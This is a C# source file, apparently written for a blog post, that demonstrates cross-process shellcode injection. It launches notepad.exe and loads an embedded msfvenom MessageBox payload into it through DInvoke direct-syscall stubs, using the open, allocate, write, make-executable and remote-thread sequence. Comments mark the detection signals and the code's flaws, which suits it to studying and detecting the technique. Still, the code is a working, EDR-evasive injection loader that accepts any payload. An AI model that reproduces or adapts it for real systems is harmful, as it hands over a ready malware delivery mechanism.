dinvoke with syscall - created for blog post
using System;
using DInvoke;
using System.Diagnostics;
using System.Runtime.InteropServices;
using DynamicInvoke = DInvoke.DynamicInvoke;
using Data = DInvoke.Data;
namespace dinvokeSyscall
{
/// <summary>
/// Blog-post demonstration: spawns notepad.exe and injects the embedded msfvenom
/// MessageBox payload into it through DInvoke syscall stubs. Every native call's
/// status is discarded, no handle is ever closed and the spawned process is left
/// running — this is a minimal walkthrough of the call sequence, not robust code.
/// </summary>
class Program
{
    /// <summary>
    /// Entry point. The steps form the canonical cross-process injection chain
    /// (open process → allocate RW → write → flip to RX → create remote thread),
    /// which is also the call pattern endpoint monitoring keys on; each step is
    /// annotated with what is observable and what the sample leaves unchecked.
    /// </summary>
    /// <param name="args">Unused.</param>
    static void Main(string[] args)
    {
        // msfvenom MessageBox payload (305 bytes), generated with:
        // msfvenom -c messageBox -a x64 --platform windows -p windows/x64/messagebox TEXT="Malicious Program incoming" -f csharp
        byte[] buf = new byte[305] {
        0xfc,0x48,0x81,0xe4,0xf0,0xff,0xff,0xff,0xe8,0xd0,0x00,0x00,0x00,0x41,0x51,
        0x41,0x50,0x52,0x51,0x56,0x48,0x31,0xd2,0x65,0x48,0x8b,0x52,0x60,0x3e,0x48,
        0x8b,0x52,0x18,0x3e,0x48,0x8b,0x52,0x20,0x3e,0x48,0x8b,0x72,0x50,0x3e,0x48,
        0x0f,0xb7,0x4a,0x4a,0x4d,0x31,0xc9,0x48,0x31,0xc0,0xac,0x3c,0x61,0x7c,0x02,
        0x2c,0x20,0x41,0xc1,0xc9,0x0d,0x41,0x01,0xc1,0xe2,0xed,0x52,0x41,0x51,0x3e,
        0x48,0x8b,0x52,0x20,0x3e,0x8b,0x42,0x3c,0x48,0x01,0xd0,0x3e,0x8b,0x80,0x88,
        0x00,0x00,0x00,0x48,0x85,0xc0,0x74,0x6f,0x48,0x01,0xd0,0x50,0x3e,0x8b,0x48,
        0x18,0x3e,0x44,0x8b,0x40,0x20,0x49,0x01,0xd0,0xe3,0x5c,0x48,0xff,0xc9,0x3e,
        0x41,0x8b,0x34,0x88,0x48,0x01,0xd6,0x4d,0x31,0xc9,0x48,0x31,0xc0,0xac,0x41,
        0xc1,0xc9,0x0d,0x41,0x01,0xc1,0x38,0xe0,0x75,0xf1,0x3e,0x4c,0x03,0x4c,0x24,
        0x08,0x45,0x39,0xd1,0x75,0xd6,0x58,0x3e,0x44,0x8b,0x40,0x24,0x49,0x01,0xd0,
        0x66,0x3e,0x41,0x8b,0x0c,0x48,0x3e,0x44,0x8b,0x40,0x1c,0x49,0x01,0xd0,0x3e,
        0x41,0x8b,0x04,0x88,0x48,0x01,0xd0,0x41,0x58,0x41,0x58,0x5e,0x59,0x5a,0x41,
        0x58,0x41,0x59,0x41,0x5a,0x48,0x83,0xec,0x20,0x41,0x52,0xff,0xe0,0x58,0x41,
        0x59,0x5a,0x3e,0x48,0x8b,0x12,0xe9,0x49,0xff,0xff,0xff,0x5d,0x49,0xc7,0xc1,
        0x00,0x00,0x00,0x00,0x3e,0x48,0x8d,0x95,0xfe,0x00,0x00,0x00,0x3e,0x4c,0x8d,
        0x85,0x19,0x01,0x00,0x00,0x48,0x31,0xc9,0x41,0xba,0x45,0x83,0x56,0x07,0xff,
        0xd5,0x48,0x31,0xc9,0x41,0xba,0xf0,0xb5,0xa2,0x56,0xff,0xd5,0x4d,0x61,0x6c,
        0x69,0x63,0x69,0x6f,0x75,0x73,0x20,0x50,0x72,0x6f,0x67,0x72,0x61,0x6d,0x20,
        0x69,0x6e,0x63,0x6f,0x6d,0x69,0x6e,0x67,0x00,0x4d,0x65,0x73,0x73,0x61,0x67,
        0x65,0x42,0x6f,0x78,0x00 };
        // Alias only — no copy is made; sc and buf are the same array.
        byte[] sc = buf;

        // Target: a freshly spawned notepad.exe. The Process object is never
        // disposed and notepad is left running after Main returns; the child
        // process creation itself is the first event a defender would see.
        var process = Process.Start("C:\\Windows\\System32\\notepad.exe");
        var pid = (uint)process.Id;
        Console.WriteLine("[+] Notepad pid: " + pid);

        // Step 1: NtOpenProcess through a DInvoke syscall stub. GetSyscallStub's
        // implementation is not on this page; presumably it returns a pointer to
        // a small stub that issues the syscall directly — confirm in DInvoke.
        IntPtr stub = DynamicInvoke.Generic.GetSyscallStub("NtOpenProcess");
        DELEGATES.NtOpenProcess NtOpenProcessSyscall = (DELEGATES.NtOpenProcess)Marshal.GetDelegateForFunctionPointer(stub, typeof(DELEGATES.NtOpenProcess));
        IntPtr procHandle = IntPtr.Zero;
        // OBJECT_ATTRIBUTES is left at its default (zeroed) state; CLIENT_ID only
        // carries the target pid, its other field stays at its default.
        Data.Native.OBJECT_ATTRIBUTES oa = new Data.Native.OBJECT_ATTRIBUTES();
        Data.Native.CLIENT_ID ci = new Data.Native.CLIENT_ID();
        ci.UniqueProcess = (IntPtr)pid;
        // PROCESS_ALL_ACCESS is requested and the returned NTSTATUS is discarded;
        // on failure procHandle most likely stays IntPtr.Zero and every later
        // call silently operates on a null handle.
        NtOpenProcessSyscall(ref procHandle, Data.Win32.Kernel32.ProcessAccessFlags.PROCESS_ALL_ACCESS, ref oa, ref ci);

        // Step 2: NtAllocateVirtualMemory — 0x00001000 | 0x00002000 is
        // MEM_COMMIT | MEM_RESERVE and 0x04 is PAGE_READWRITE, i.e. the region is
        // first allocated writable but not executable. baseAddress and
        // regionSize are ref, so the kernel writes back the chosen base and the
        // actual size. Status again unchecked; a failure leaves baseAddress zero.
        stub = DynamicInvoke.Generic.GetSyscallStub("NtAllocateVirtualMemory");
        IntPtr baseAddress = IntPtr.Zero;
        UInt32 regionSize = (UInt32)sc.Length;
        DELEGATES.NtAllocateVirtualMemory NtAllocateVirtualMemorySyscall= (DELEGATES.NtAllocateVirtualMemory)Marshal.GetDelegateForFunctionPointer(stub, typeof(DELEGATES.NtAllocateVirtualMemory));
        NtAllocateVirtualMemorySyscall(procHandle, ref baseAddress, (UInt32)0, ref regionSize, (UInt32)0x00001000 | (UInt32)0x00002000, (UInt32)0x04);
        Console.WriteLine("[+] Allocated memory addr: 0x" + baseAddress.ToInt64().ToString("x2"));

        // Step 3: NtWriteVirtualMemory copies the payload into the remote region.
        // bufferLength doubles as the BytesWritten out-parameter, so it is
        // overwritten with the count actually written. Note that
        // UnsafeAddrOfPinnedArrayElement assumes a pinned array, but nothing on
        // this page pins sc (no fixed block, no GCHandle) — the GC is free to
        // relocate the array while its address is in use.
        stub = DynamicInvoke.Generic.GetSyscallStub("NtWriteVirtualMemory");
        UInt32 bufferLength = (UInt32)sc.Length;
        DELEGATES.NtWriteVirtualMemory NtWriteVirtualMemorySyscall = (DELEGATES.NtWriteVirtualMemory)Marshal.GetDelegateForFunctionPointer(stub, typeof(DELEGATES.NtWriteVirtualMemory));
        NtWriteVirtualMemorySyscall(procHandle, baseAddress, Marshal.UnsafeAddrOfPinnedArrayElement(sc, 0), bufferLength, ref bufferLength);

        // Step 4: NtProtectVirtualMemory flips the region to PAGE_EXECUTE_READ
        // (0x20). This write-then-make-executable transition on memory in a
        // foreign process is the observable hallmark of the technique (the
        // region is never RWX). RegionSize is an IntPtr here, not a UInt32,
        // because the NtProtectVirtualMemory delegate declares it that way.
        stub = DynamicInvoke.Generic.GetSyscallStub("NtProtectVirtualMemory");
        UInt32 oldProtect = (UInt32)0;
        IntPtr regionSizePtr = (IntPtr)sc.Length;
        DELEGATES.NtProtectVirtualMemory NtProtectVirtualMemorySyscall = (DELEGATES.NtProtectVirtualMemory)Marshal.GetDelegateForFunctionPointer(stub, typeof(DELEGATES.NtProtectVirtualMemory));
        NtProtectVirtualMemorySyscall(procHandle, ref baseAddress, ref regionSizePtr, (UInt32)0x20, ref oldProtect);

        // Step 5: NtCreateThreadEx starts a thread in the target at the payload's
        // base address — not suspended, no parameter, no attribute list. The
        // thread handle (note the "threadHeandle" typo) is never waited on or
        // closed, the status is discarded, and the success line below prints
        // regardless of whether any earlier step actually succeeded.
        stub = DynamicInvoke.Generic.GetSyscallStub("NtCreateThreadEx");
        DELEGATES.NtCreateThreadEx NtCreateThreadExSyscall = (DELEGATES.NtCreateThreadEx)Marshal.GetDelegateForFunctionPointer(stub, typeof(DELEGATES.NtCreateThreadEx));
        NtCreateThreadExSyscall(out IntPtr threadHeandle, Data.Win32.WinNT.ACCESS_MASK.MAXIMUM_ALLOWED, IntPtr.Zero, procHandle, baseAddress, IntPtr.Zero, false, 0, 0, 0, IntPtr.Zero);
        Console.WriteLine("[+] Starting Remote Thread");
    }
}
/// <summary>
/// Managed delegate prototypes for the native NT functions the syscall stubs are
/// bound to via Marshal.GetDelegateForFunctionPointer. Parameter order and
/// marshalling (ref/out for pointer arguments) must mirror the native prototypes
/// exactly, since nothing validates them at bind time. Return types are
/// inconsistent across the set: NtOpenProcess, NtAllocateVirtualMemory and
/// NtCreateThreadEx return Data.Native.NTSTATUS while NtProtectVirtualMemory and
/// NtWriteVirtualMemory return a raw UInt32; callers in this file ignore all of them.
/// The StdCall attribute is the convention requested for the unmanaged side; on
/// x64 Windows there is only one calling convention, so it is effectively a no-op there.
/// </summary>
public class DELEGATES
{
    /// <summary>NtOpenProcess: ProcessHandle receives the opened handle; ObjectAttributes and ClientId are passed by reference (pointer semantics).</summary>
    [UnmanagedFunctionPointer(CallingConvention.StdCall)]
    public delegate Data.Native.NTSTATUS NtOpenProcess(ref IntPtr ProcessHandle, Data.Win32.Kernel32.ProcessAccessFlags AccessMask, ref Data.Native.OBJECT_ATTRIBUTES ObjectAttributes, ref Data.Native.CLIENT_ID ClientId);
    /// <summary>NtAllocateVirtualMemory: BaseAddress and RegionSize are in/out; RegionSize is declared UInt32 here (contrast NtProtectVirtualMemory below).</summary>
    [UnmanagedFunctionPointer(CallingConvention.StdCall)]
    public delegate Data.Native.NTSTATUS NtAllocateVirtualMemory(IntPtr ProcessHandle, ref IntPtr BaseAddress, UInt32 ZeroBits, ref UInt32 RegionSize, UInt32 AllocationType, UInt32 Protect);
    /// <summary>NtProtectVirtualMemory: RegionSize is an IntPtr (pointer-sized) here; returns the status as a raw UInt32 rather than NTSTATUS.</summary>
    [UnmanagedFunctionPointer(CallingConvention.StdCall)]
    public delegate UInt32 NtProtectVirtualMemory(IntPtr ProcessHandle, ref IntPtr BaseAddress, ref IntPtr RegionSize, UInt32 NewProtect, ref UInt32 OldProtect);
    /// <summary>NtWriteVirtualMemory: Buffer is a raw pointer to the source bytes; BytesWritten is filled in by the call. Returns a raw UInt32 status.</summary>
    [UnmanagedFunctionPointer(CallingConvention.StdCall)]
    public delegate UInt32 NtWriteVirtualMemory(IntPtr ProcessHandle, IntPtr BaseAddress, IntPtr Buffer, UInt32 BufferLength, ref UInt32 BytesWritten);
    /// <summary>NtCreateThreadEx: threadHandle is an out parameter; parameter names use camelCase unlike the other delegates (style inconsistency only).</summary>
    [UnmanagedFunctionPointer(CallingConvention.StdCall)]
    public delegate Data.Native.NTSTATUS NtCreateThreadEx(out IntPtr threadHandle, Data.Win32.WinNT.ACCESS_MASK desiredAccess, IntPtr objectAttributes, IntPtr processHandle, IntPtr startAddress, IntPtr parameter, bool createSuspended, int stackZeroBits, int sizeOfStack, int maximumStackSize, IntPtr attributeList);
}
}